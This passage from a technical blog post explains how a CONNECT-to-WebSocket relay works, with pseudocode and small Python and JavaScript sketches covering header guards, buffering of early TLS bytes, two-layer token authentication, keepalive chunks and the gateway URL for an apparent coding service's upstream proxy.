            &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Guard&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;reject&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;header&lt;/span&gt; &lt;span class="nx"&gt;exceeds&lt;/span&gt; &lt;span class="mi"&gt;8&lt;/span&gt;&lt;span class="nc"&gt;KB &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;not&lt;/span&gt; &lt;span class="nx"&gt;a&lt;/span&gt; &lt;span class="nx"&gt;real&lt;/span&gt; &lt;span class="nx"&gt;CONNECT&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;length&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;state&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;connectBuf&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;8192&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="nx"&gt;socket&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;HTTP/1.1 400 Bad Request&lt;/span&gt;&lt;span class="se"&gt;\r\n\r\n&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
                &lt;span class="nx"&gt;socket&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;end&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt;

        &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Parse&lt;/span&gt; &lt;span class="nx"&gt;the&lt;/span&gt; &lt;span class="nx"&gt;CONNECT&lt;/span&gt; &lt;span class="nx"&gt;line&lt;/span&gt;
        &lt;span class="nx"&gt;firstLine&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;state&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;connectBuf&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="nx"&gt;headerEnd&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nf"&gt;split&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\r\n&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
        &lt;span class="nx"&gt;match&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;regex&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;CONNECT (&lt;/span&gt;&lt;span class="se"&gt;\&lt;/span&gt;&lt;span class="s2"&gt;S+) HTTP/1.[01]&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;firstLine&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;no&lt;/span&gt; &lt;span class="nx"&gt;match&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="nx"&gt;socket&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;HTTP/1.1 405 Method Not Allowed&lt;/span&gt;&lt;span class="se"&gt;\r\n\r\n&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="nx"&gt;socket&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;end&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt;

        &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Save&lt;/span&gt; &lt;span class="nx"&gt;any&lt;/span&gt; &lt;span class="nx"&gt;bytes&lt;/span&gt; &lt;span class="nx"&gt;that&lt;/span&gt; &lt;span class="nx"&gt;arrived&lt;/span&gt; &lt;span class="nx"&gt;after&lt;/span&gt; &lt;span class="nx"&gt;the&lt;/span&gt; &lt;span class="nx"&gt;header&lt;/span&gt;
        &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;TCP&lt;/span&gt; &lt;span class="nx"&gt;can&lt;/span&gt; &lt;span class="nx"&gt;coalesce&lt;/span&gt; &lt;span class="nx"&gt;CONNECT&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;TLS&lt;/span&gt; &lt;span class="nx"&gt;ClientHello&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;one&lt;/span&gt; &lt;span class="nx"&gt;packet&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nx"&gt;trailing&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;state&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;connectBuf&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;headerEnd&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;:]&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;trailing&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="nx"&gt;not&lt;/span&gt; &lt;span class="nx"&gt;empty&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="nx"&gt;state&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;pending&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;trailing&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="nf"&gt;openTunnel&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;socket&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;state&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;firstLine&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The 8KB guard prevents a misbehaving client from filling memory with a never-terminating header. The 405 response handles non-CONNECT methods — the relay only does CONNECT, not GET/POST. The trailing-bytes buffer handles TCP coalescing, where the client's CONNECT request and TLS ClientHello arrive in the same TCP segment.&lt;/p&gt;
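&lt;p&gt;The Phase 1 guards are easy to exercise in isolation. Here is a runnable Python condensation of the pseudocode above (simplified and illustrative; the real relay is stateful and written for Bun):&lt;/p&gt;

```python
import re

MAX_HEADER = 8192
CONNECT_RE = re.compile(rb"^CONNECT (\S+) HTTP/1\.[01]")

def handle_bytes(buf):
    """Return ('wait',), ('400',), ('405',), or ('ok', target, trailing)."""
    header_end = buf.find(b"\r\n\r\n")
    if header_end == -1:
        # No complete header yet: reject oversized garbage, else keep buffering
        if len(buf) > MAX_HEADER:
            return ("400",)
        return ("wait",)
    first_line = buf[:header_end].split(b"\r\n")[0]
    m = CONNECT_RE.match(first_line)
    if m is None:
        return ("405",)  # the relay speaks CONNECT only, not GET/POST
    # TCP can coalesce CONNECT and the TLS ClientHello into one segment;
    # bytes after the header belong to the tunnel, not the handshake
    trailing = buf[header_end + 4:]
    return ("ok", m.group(1), trailing)
```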

&lt;p&gt;&lt;strong&gt;Phase 2: WebSocket Tunnel&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;openTunnel&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;socket&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;state&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;connectLine&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Open&lt;/span&gt; &lt;span class="nx"&gt;WebSocket&lt;/span&gt; &lt;span class="nx"&gt;to&lt;/span&gt; &lt;span class="nx"&gt;the&lt;/span&gt; &lt;span class="nx"&gt;cloud&lt;/span&gt; &lt;span class="nx"&gt;gateway&lt;/span&gt;
    &lt;span class="nx"&gt;ws&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;WebSocket&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;wsUrl&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="na"&gt;headers&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;Content-Type&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;application/proto&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;Authorization&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;Bearer &amp;lt;session-token&amp;gt;&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;})&lt;/span&gt;
    &lt;span class="nx"&gt;ws&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;binaryType&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;arraybuffer&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;

    &lt;span class="nx"&gt;ws&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;onopen&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;():&lt;/span&gt;
        &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Send&lt;/span&gt; &lt;span class="nx"&gt;the&lt;/span&gt; &lt;span class="nx"&gt;CONNECT&lt;/span&gt; &lt;span class="nx"&gt;line&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;auth&lt;/span&gt; &lt;span class="nx"&gt;to&lt;/span&gt; &lt;span class="nx"&gt;the&lt;/span&gt; &lt;span class="nx"&gt;gateway&lt;/span&gt;
        &lt;span class="nx"&gt;head&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;connectLine&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\r\n&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;
             &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;Proxy-Authorization: Basic &amp;lt;sessionId:token&amp;gt;&lt;/span&gt;&lt;span class="se"&gt;\r\n&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;
             &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\r\n&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;
        &lt;span class="nx"&gt;ws&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;send&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;encodeChunk&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;head&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

        &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Flush&lt;/span&gt; &lt;span class="nx"&gt;any&lt;/span&gt; &lt;span class="nx"&gt;bytes&lt;/span&gt; &lt;span class="nx"&gt;buffered&lt;/span&gt; &lt;span class="nx"&gt;during&lt;/span&gt; &lt;span class="nx"&gt;WS&lt;/span&gt; &lt;span class="nx"&gt;handshake&lt;/span&gt;
        &lt;span class="nx"&gt;state&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;wsOpen&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="nx"&gt;buf&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;state&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;pending&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="nf"&gt;forwardToWs&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;ws&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nx"&gt;state&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;pending&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;

        &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Start&lt;/span&gt; &lt;span class="nx"&gt;keepalive&lt;/span&gt; &lt;span class="nf"&gt;pings &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;30&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="nx"&gt;second&lt;/span&gt; &lt;span class="nx"&gt;interval&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nx"&gt;state&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;pinger&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;setInterval&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;sendKeepalive&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;30000&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;ws&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="nx"&gt;ws&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;onmessage&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;event&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="nx"&gt;payload&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;decodeChunk&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;event&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;payload&lt;/span&gt; &lt;span class="nx"&gt;and&lt;/span&gt; &lt;span class="nx"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;length&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="nx"&gt;state&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;established&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
            &lt;span class="nx"&gt;socket&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="nx"&gt;ws&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;onerror&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;event&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;not&lt;/span&gt; &lt;span class="nx"&gt;state&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;established&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="nx"&gt;socket&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;HTTP/1.1 502 Bad Gateway&lt;/span&gt;&lt;span class="se"&gt;\r\n\r\n&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nx"&gt;socket&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;end&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="nx"&gt;ws&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;onclose&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;():&lt;/span&gt;
        &lt;span class="nx"&gt;socket&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;end&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;There are two authentication layers. The WebSocket upgrade carries a &lt;code&gt;Bearer&lt;/code&gt; token — the gateway requires session-level auth on the upgrade request itself (the endpoint is marked &lt;code&gt;PRIVATE_API&lt;/code&gt; in its proto definition). Inside the tunnel, the CONNECT request carries &lt;code&gt;Proxy-Authorization: Basic&lt;/code&gt; with the session ID and token; this authenticates the specific tunnel and tells the gateway which target host:port to connect to.&lt;/p&gt;
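&lt;p&gt;As a minimal sketch (the helper name is an assumption, not the relay's actual code), the two credentials can be built like this; the Basic credential is just base64 of &lt;code&gt;sessionId:token&lt;/code&gt;:&lt;/p&gt;

```javascript
// Sketch (assumed helper name): the two credentials the relay sends.
// Layer 1: a Bearer token on the WebSocket upgrade request.
// Layer 2: a Basic credential inside the tunneled CONNECT head.
function buildAuthHeaders(sessionId, token) {
  const basic = Buffer.from(`${sessionId}:${token}`).toString("base64");
  return {
    upgrade: { Authorization: `Bearer ${token}` },        // session-level auth
    connect: `Proxy-Authorization: Basic ${basic}\r\n`,   // per-tunnel auth
  };
}
```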

&lt;h3&gt;
  
  
  The Content-Type Trap
&lt;/h3&gt;

&lt;p&gt;The WebSocket connection must set &lt;code&gt;Content-Type: application/proto&lt;/code&gt;. Without it, the server's Go code treats the chunks as JSON and attempts &lt;code&gt;protojson.Unmarshal&lt;/code&gt; on the hand-encoded binary — which silently fails with EOF, producing no error but also no tunnel. This was presumably discovered through debugging, not design.&lt;/p&gt;

&lt;h3&gt;
  
  
  Keepalive
&lt;/h3&gt;

&lt;p&gt;The sidecar proxy has a 50-second idle timeout. The relay sends an empty protobuf chunk (zero-length data field) every 30 seconds as an application-level keepalive. Not all WebSocket implementations expose &lt;code&gt;ping()&lt;/code&gt;, so the empty chunk serves as a universal keepalive that the server can ignore.&lt;/p&gt;
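&lt;p&gt;Under the hand-rolled protobuf framing, a chunk with a zero-length &lt;code&gt;data&lt;/code&gt; field can be framed as just two bytes: the field-1/wire-type-2 tag &lt;code&gt;0x0a&lt;/code&gt; and a varint length of zero. A minimal sketch (assumed names, not the relay's code):&lt;/p&gt;

```javascript
// Keepalive chunk: tag 0x0a (field 1, wire type 2) plus varint length 0.
function encodeKeepalive() {
  return new Uint8Array([0x0a, 0x00]);
}

// The receiving side can recognize and discard these: empty payload.
function isKeepalive(bytes) {
  if (bytes.length !== 2) return false;
  if (bytes[0] !== 0x0a) return false;
  return bytes[1] === 0x00;
}
```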

&lt;h3&gt;
  
  
  The Pending Buffer
&lt;/h3&gt;

&lt;p&gt;Between parsing the CONNECT header and the WebSocket connection becoming open, bytes can keep arriving. The subprocess's TLS library doesn't wait for the proxy handshake — it can send the TLS ClientHello immediately after the CONNECT request, sometimes in the same TCP packet (kernel coalescing), sometimes in a separate data event that fires before &lt;code&gt;ws.onopen&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Without buffering, these bytes would be silently dropped. The relay tracks a &lt;code&gt;pending&lt;/code&gt; array: any data that arrives after the CONNECT parse but before &lt;code&gt;wsOpen&lt;/code&gt; is true gets pushed to pending. When &lt;code&gt;onopen&lt;/code&gt; fires, pending is flushed in order. This handles both sources of early data:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;TCP&lt;/span&gt; &lt;span class="nx"&gt;coalescing&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;CONNECT&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;ClientHello&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;one&lt;/span&gt; &lt;span class="nx"&gt;packet&lt;/span&gt;
&lt;span class="nx"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;CONNECT&lt;/span&gt; &lt;span class="nx"&gt;api&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;example&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;com&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;443&lt;/span&gt; &lt;span class="nx"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="mf"&gt;1.1&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="nx"&gt;r&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="nx"&gt;n&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="nx"&gt;r&lt;/span&gt;&lt;span class="err"&gt;\&lt;/span&gt;&lt;span class="nx"&gt;n&lt;/span&gt;&lt;span class="p"&gt;][&lt;/span&gt;&lt;span class="nx"&gt;TLS&lt;/span&gt; &lt;span class="nx"&gt;ClientHello&lt;/span&gt;&lt;span class="p"&gt;...]&lt;/span&gt;
                                                       &lt;span class="o"&gt;^---&lt;/span&gt; &lt;span class="nx"&gt;trailing&lt;/span&gt; &lt;span class="nx"&gt;bytes&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="nx"&gt;pending&lt;/span&gt;

&lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Async&lt;/span&gt; &lt;span class="nx"&gt;race&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;data&lt;/span&gt; &lt;span class="nx"&gt;event&lt;/span&gt; &lt;span class="nx"&gt;fires&lt;/span&gt; &lt;span class="nx"&gt;before&lt;/span&gt; &lt;span class="nx"&gt;onopen&lt;/span&gt;
&lt;span class="nx"&gt;ws&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;WebSocket&lt;/span&gt;&lt;span class="p"&gt;(...)&lt;/span&gt;   &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;handshake&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;flight&lt;/span&gt;
&lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="p"&gt;...&lt;/span&gt; &lt;span class="nx"&gt;socket&lt;/span&gt; &lt;span class="nx"&gt;data&lt;/span&gt; &lt;span class="nx"&gt;callback&lt;/span&gt; &lt;span class="nx"&gt;fires&lt;/span&gt; &lt;span class="kd"&gt;with&lt;/span&gt; &lt;span class="nx"&gt;TLS&lt;/span&gt; &lt;span class="nx"&gt;bytes&lt;/span&gt; &lt;span class="p"&gt;...&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;not&lt;/span&gt; &lt;span class="nx"&gt;wsOpen&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="nx"&gt;pending&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;buffered&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;not&lt;/span&gt; &lt;span class="nx"&gt;lost&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
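&lt;p&gt;Stripped of the transport details, the pattern is a dozen lines. This sketch (assumed names) simulates both orderings and shows why the flush must preserve arrival order:&lt;/p&gt;

```javascript
// Minimal sketch of the pending-buffer pattern (assumed names).
// Data arriving before the WebSocket opens is queued, then flushed in order.
function makeTunnelState() {
  const sent = [];                        // stand-in for ws.send
  const state = { wsOpen: false, pending: [] };
  return {
    onSocketData(buf) {
      if (state.wsOpen) sent.push(buf);   // tunnel is up: forward directly
      else state.pending.push(buf);       // handshake in flight: buffer
    },
    onWsOpen() {
      state.wsOpen = true;
      for (const buf of state.pending) sent.push(buf);  // flush in order
      state.pending = [];
    },
    sent,
  };
}
```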



&lt;h3&gt;
  
  
  The WebSocket URL
&lt;/h3&gt;

&lt;p&gt;The relay constructs the WebSocket URL from the API base URL with a simple transform:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="nx"&gt;wsUrl&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;baseUrl&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;replace&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;http&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;ws&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;/v1/code/upstreamproxy/ws&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;
&lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;https&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;//api.anthropic.com → wss://api.anthropic.com/v1/code/upstreamproxy/ws&lt;/span&gt;
